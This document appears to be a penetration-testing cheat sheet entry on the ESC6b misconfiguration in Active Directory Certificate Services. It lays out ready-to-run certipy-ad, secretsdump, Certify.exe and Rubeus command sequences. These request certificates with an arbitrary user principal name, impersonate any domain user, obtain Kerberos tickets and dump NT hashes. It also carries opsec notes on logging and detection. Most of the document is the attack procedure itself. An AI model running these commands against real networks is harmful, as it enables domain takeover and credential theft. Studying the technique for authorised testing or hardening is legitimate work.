ADCSESC6b
ESC6b: EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled on CA (weak/no strong mapping) β enroll in any Client Auth template and specify an arbitrary UPN SAN to impersonate any user without needing a SID extension.
Applies to: Users/Computers with Enroll rights on any Client Auth template β Enterprise CA with EDITF_ATTRIBUTESUBJECTALTNAME2 set (strong cert mapping NOT enforced or disabled)
Linux Abuse
certipy-ad
# Step 1: Confirm CA flag and find usable templates
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout
# Step 2: Request cert with arbitrary UPN (no SID required β weak mapping)
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-ca '<ca>' -target <ca-host> -template '<template>' \
-upn <target-user>@<domain>
# Output: <target-user>.pfx
# Step 3: Authenticate β get NT hash
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>
# Step 4: PTH / secretsdump
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'
Windows Abuse
Certify.exe + Rubeus
# Step 1: Find CA with EDITF_ATTRIBUTESUBJECTALTNAME2
Certify.exe find /vulnerable
# Step 2: Request cert with arbitrary UPN
Certify.exe request /ca:<ca-host>\<ca> /template:<template> /upn:<target-user>@<domain>
# Step 3: TGT
Rubeus.exe asktgt /user:<target-user> /domain:<domain> \
/certificate:<pfx-base64> /ptt
# Verify
klist
Verify CA flag (certutil)
certutil.exe -config "<ca-host>\<ca>" -getreg "policy\EditFlags"
# Look for EDITF_ATTRIBUTESUBJECTALTNAME2 (value 0x00014C02 includes it)
Opsec
- Simpler than ESC6a β no SID embedding needed, works on unpatched/misconfigured DCs.
- CA retains all issued certificates; requesting principal is logged alongside the spoofed UPN.
- The CA flag
EDITF_ATTRIBUTESUBJECTALTNAME2is a well-known indicator; defenders check withcertutil -getreg.